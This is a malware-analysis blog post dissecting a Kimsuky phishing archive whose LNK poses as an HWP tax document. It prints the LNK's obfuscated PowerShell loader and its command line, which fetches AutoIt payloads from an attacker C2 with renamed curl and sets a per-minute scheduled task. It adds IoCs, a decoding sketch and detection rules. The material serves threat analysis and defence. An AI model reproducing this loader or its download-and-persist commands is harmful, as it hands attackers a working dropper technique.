lazarusholic

Malware made by North Korea's Kimsuky: 미신고 자금 출처명세서(찾아가는 법 찾기).zip (2025.6.4)

2025-06-23, Sakai
https://wezard4u.tistory.com/429517
#Kimsuky #LNK

Contents

Today we look at another piece of malware made by North Korea's Kimsuky group: 미신고 자금 출처명세서(찾아가는 법 찾기).zip (2025.6.4), roughly "statement of the source of unreported funds". A rough first look suggests it was meant to be delivered to victims by e-mail.
File name: 미신고 자금 출처명세서(찾아가는 법 찾기).zip
Size: 1 MB
MD5: e2328974ecc81be06619bbd06ebfacb4
SHA-1: f1aa607507e97cf2dee3d3059d3b2b1e73e04087
SHA-256: b24b1aa0a95e1c1a594bd8b34877fa156106bc0c41a4022ab7c4d3a9d6edfaa3
Archive contents
첨부2.과세표준수정신고서 및 추가자진납부계산서(국세기본법 시행규칙)
첨부1.취득자금 소명대상 금액의 출처 확인서(국제조세조정에 관한 법률 시행규칙).hwp
미신고 자금출처명세서(부가가치세법 시행규칙).hwp.lnk <- this is the key file (hashes below)
File name: 미신고 자금출처명세서(부가가치세법 시행규칙).hwp.lnk
Size: 1 MB
MD5: cc72c5bf20e8d5d6efa66dfc1d8efaa4
SHA-1: 31bd1480d76972b1727c9ef6953741fd62721fa8
SHA-256: 2d516c97e510bbdfb89eae329b88e0bf5557105b8e1f1de91f88f0e944835f15
From a rough look it appears the .hwp (Hancom Office document) is the decoy.
StringData
{
namestring: Type: HWP 2022 Document
Size: 27 KB
Date modified: 03/23/2025 14:51
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshel
l(.)exe /s /b /od') do call %a "$managing=0;<#App-Poisoning#>$baker='(l)ength';<#App
-Poisoning#>$dates=Get-Location;$crystal=&(gcm *et-Child*) *.lnk;<#App-Poisoning#>$c
rystal=$crystal|(w)here-object{$_.$baker -eq 0x0000891F};<#App-Poisoning#>$flexiblen
side(r)=$crystal;<#App-Poisoning#>$crystal=$crystal|Select-Object -ExpandProperty Na
me;<#App-Poisoning#>if([string]::IsNullOrEmpty($crystal)){$managing=1;<#App-Poisoni(n)
g#>$dates=$env:USERPROFILE;<#App-Poisoning#>$dates=$dates+'\appdata\local\te(m)p';<#Ap
p-Poisoning#>$crystal=Get-ChildIt(e)m -Path $dates -Recurse -Filter *.lnk|where-object
{$_.$baker -eq 0x0000891(F)}|ForEach-Object{$_.FullName}|Select-Ob(j)ect -First 1;<#Ap
p-Poisoning#>$flexiblensider=$cryst(a)l};<#App-Poisoning#>$toshiba=$crystal.subst(r)in
g(0,$crystal.length-4);$actual=[System.IO.BinaryReader]::new([System.IO.File]::open($c
rystal,[Syst(e)m.IO.FileMode]::Open,[System.IO.FileAccess]::Read,[System.IO.FileShare]
::Read));try{$actual.BaseStream.Seek(0x0000182A,[Sy(s)tem.IO.SeekOrigin]::Begin);$appe
al=$actual.ReadBytes(0x00004800);}finally{$actual.Close()};$copper=0;$outlet=0;$gadget
s=$a(p)peal.count;while ($copper -lt $gadgets){$period=0x01;$outlet=$copper-[math(])::
Floor($copper/$period)*$per(i)od;$preview=0x7F+$outlet;$appeal[$copper]=$appeal[$coppe
r] -bxor $preview;$copper++};[Syste(m).IO.File]::WriteAllBytes($toshiba,$appeal);if($m
anaging -eq 1){$blocks=$toshiba}else{$blocks='.\'+$toshiba};& ($)blocks;remove-item -p
ath $flexiblensider -force;"&VGnNWAKjlxZpgiwvLDqrzQYmfRPMbCsJFduekUatX||c()d /d C:\Use
rs\Public\Videos & copy c:\windows\system32\curl(.)exe pJHUsvn.exe & copy c:\windows\s
ystem32\schtasks(.)exe pJHUsvn1.exe & pJHUsvn -k -o AutoIt3(.)exe hxxps://thegreatrati
ngs(.)com/wp-admin/js/widgets/hurryup/?rv=bear^&z(a)=battle0 & pJHUsv(n) -k -o CfjiFUW
.cdr hxxps://thegreatratings(.)com/wp-admin/js/widgets/hurryup/?rv=bear^&z(a)=battle1
& pJHUsv(n)1 /delete /tn "CfjiFUW" /f & pJHUsvn1 /create /sc mi(n)ute /mo 1 /tn "CfjiF
UW" /tr "C:\Users\Public\Videos\AutoIt3(.)exe C:\Users\Public\Videos\Cfj(i)FUW(.)cdr"
iconlocation: …
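The stage-1 PowerShell in the command line above locates a .lnk whose size is exactly 0x891F bytes (first in the current directory, otherwise under %USERPROFILE%\appdata\local\temp), seeks to offset 0x182A of it, reads 0x4800 bytes, XORs every byte with 0x7F + (i mod $period), which is simply the constant 0x7F because $period is 1, writes the result under the .lnk name with the last four characters stripped (the .hwp decoy name), runs it, and deletes the .lnk. The Python below is an added analyst reproduction of that carve-and-decode step, not the blog author's code: the constants come from the command line, the sample blob it decodes is constructed here (not the real file), and the OLE compound-file magic check for an .hwp 5.x document is an assumption of mine. Nothing decoded is written to disk or executed.

```python
"""Analyst reproduction of the Kimsuky LNK stage-1 carve-and-XOR step.

Added example, not the blog author's code.  Constants are taken from the
PowerShell in the .lnk's command line; the sample blob is constructed here
and is NOT the real file.  Nothing decoded is written to disk or executed.
"""

LNK_SIZE = 0x891F        # size the script filters .lnk files on (35103 bytes)
PAYLOAD_OFFSET = 0x182A  # Seek() position
PAYLOAD_LENGTH = 0x4800  # ReadBytes() length
XOR_BASE = 0x7F          # $preview = 0x7F + $outlet
XOR_PERIOD = 0x01        # $period; i mod 1 is always 0, so the key is constant

# Assumption: an .hwp 5.x document is an OLE compound file with this magic.
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")


def key_byte(i: int) -> int:
    """Same derivation as the script: 0x7F + (i mod $period), one byte."""
    return (XOR_BASE + (i % XOR_PERIOD)) & 0xFF


def decode_payload(lnk_bytes: bytes) -> bytes:
    """Carve the embedded region and undo the XOR, as the script does."""
    if len(lnk_bytes) != LNK_SIZE:
        raise ValueError(f"size {len(lnk_bytes):#x} != expected {LNK_SIZE:#x}")
    region = lnk_bytes[PAYLOAD_OFFSET:PAYLOAD_OFFSET + PAYLOAD_LENGTH]
    return bytes(b ^ key_byte(i) for i, b in enumerate(region))


def output_name(lnk_name: str) -> str:
    """$toshiba: the .lnk name minus its last four characters ('.lnk')."""
    return lnk_name[:-4]


def looks_like_hwp(data: bytes) -> bool:
    """Cheap sanity check on the decoded bytes (OLE/CFB header)."""
    return data.startswith(OLE_MAGIC)


def build_sample_lnk(decoy: bytes) -> bytes:
    """Constructed stand-in for the real .lnk: zero-filled to LNK_SIZE with
    the XOR-encoded decoy placed at PAYLOAD_OFFSET."""
    padded = decoy.ljust(PAYLOAD_LENGTH, b"\x00")[:PAYLOAD_LENGTH]
    encoded = bytes(b ^ key_byte(i) for i, b in enumerate(padded))
    blob = bytearray(LNK_SIZE)
    blob[PAYLOAD_OFFSET:PAYLOAD_OFFSET + PAYLOAD_LENGTH] = encoded
    return bytes(blob)


if __name__ == "__main__":
    sample = build_sample_lnk(OLE_MAGIC + b"constructed decoy body")
    decoded = decode_payload(sample)
    print(output_name("sample.hwp.lnk"), looks_like_hwp(decoded), len(decoded))
```

The size filter (0x891F) is the only thing tying the script to its own .lnk, which is why the script falls back to searching the user's temp directory: a mail client that extracts the archive there still lets it find itself. For triage of a real sample, replace the constructed blob with the file's bytes and inspect the decoded output in a sandbox rather than opening it.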

IoC

66.96.162.245
31bd1480d76972b1727c9ef6953741fd62721fa8
f1aa607507e97cf2dee3d3059d3b2b1e73e04087
b24b1aa0a95e1c1a594bd8b34877fa156106bc0c41a4022ab7c4d3a9d6edfaa3
2d516c97e510bbdfb89eae329b88e0bf5557105b8e1f1de91f88f0e944835f15
cc72c5bf20e8d5d6efa66dfc1d8efaa4
e2328974ecc81be06619bbd06ebfacb4
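The second half of the command line (after the PowerShell stage) changes directory to C:\Users\Public\Videos, copies curl.exe and schtasks.exe there under random names, uses the renamed curl to fetch AutoIt3.exe and a .cdr file from the C2, and then uses the renamed schtasks to create a task that runs AutoIt3.exe on the .cdr every minute. Because the LOLBins are renamed, matching on the image name curl.exe / schtasks.exe misses them; the pattern survives only in the command-line arguments. The Python below is an added detection sketch of mine, not the blog author's code and not a vendor rule, run over constructed process-creation events. The event format (dicts with image, cmdline and dst_ip) is an assumption, the C2 IP is taken from the IoC list above, and the download URL in the sample is a placeholder.

```python
"""Behavioural triage of process-creation events for the stage-2 pattern.

Added detection sketch, not the blog author's code and not a vendor rule.
Event format (dicts with image / cmdline / dst_ip) is an assumption; the
events below are constructed for the example, the C2 IP is from the IoC
list above, and the download URL is a placeholder.
"""
from __future__ import annotations

import re

# (rule name, regex over the full command line).  None of them rely on the
# image name: the sample copies curl.exe / schtasks.exe to Public\Videos
# under random names, so only the argument pattern survives the rename.
RULES = [
    ("powershell_located_by_dir_glob",
     re.compile(r"for\s+/f\b.*\bdir\b.*WindowsPowerShell\\v1\.0\\\*rshel", re.I)),
    ("curl_or_schtasks_copied_to_public_videos",
     re.compile(r"Public\\Videos.*copy\s+c:\\windows\\system32\\(curl|schtasks)\.exe\s+\S+", re.I)),
    ("minute_task_running_autoit_cdr",
     re.compile(r'/create\s+/sc\s+minute\s+/mo\s+1\b.*?/tr\s+"[^"]*AutoIt3\.exe[^"]*\.cdr"', re.I)),
]
KNOWN_C2_IPS = {"66.96.162.245"}  # from the IoC list above


def match_rules(cmdline: str) -> list[str]:
    """Names of every behavioural rule that fires on one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def triage(events: list[dict]) -> list[tuple[int, str]]:
    """Return (event index, finding) pairs for every event that fires."""
    hits = []
    for i, ev in enumerate(events):
        for name in match_rules(ev.get("cmdline", "")):
            hits.append((i, name))
        if ev.get("dst_ip") in KNOWN_C2_IPS:
            hits.append((i, "known_c2_ip"))
    return hits


# Constructed events modelled on the command line above; not real telemetry.
SAMPLE_EVENTS = [
    {"image": "cmd.exe",
     "cmdline": r"""cmd.exe /c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a"""},
    {"image": "cmd.exe",
     "cmdline": r"cmd.exe /c cd /d C:\Users\Public\Videos & copy c:\windows\system32\curl.exe pJHUsvn.exe & copy c:\windows\system32\schtasks.exe pJHUsvn1.exe"},
    {"image": "pJHUsvn.exe", "dst_ip": "66.96.162.245",
     "cmdline": r"pJHUsvn -k -o AutoIt3.exe https://c2.example.invalid/stage"},  # placeholder URL
    {"image": "pJHUsvn1.exe",
     "cmdline": r'pJHUsvn1 /create /sc minute /mo 1 /tn "CfjiFUW" /tr "C:\Users\Public\Videos\AutoIt3.exe C:\Users\Public\Videos\CfjiFUW.cdr"'},
    {"image": "notepad.exe", "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},  # benign control
]


if __name__ == "__main__":
    for idx, finding in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["image"], finding)
```

On real telemetry the rename is less of a problem than it looks: Sysmon event ID 1 records OriginalFileName from the PE version resource, so the copies in Public\Videos still report curl.exe and schtasks.exe there, and an AutoIt3.exe interpreter executing a file with a non-.au3 extension from a world-writable directory is worth a rule of its own.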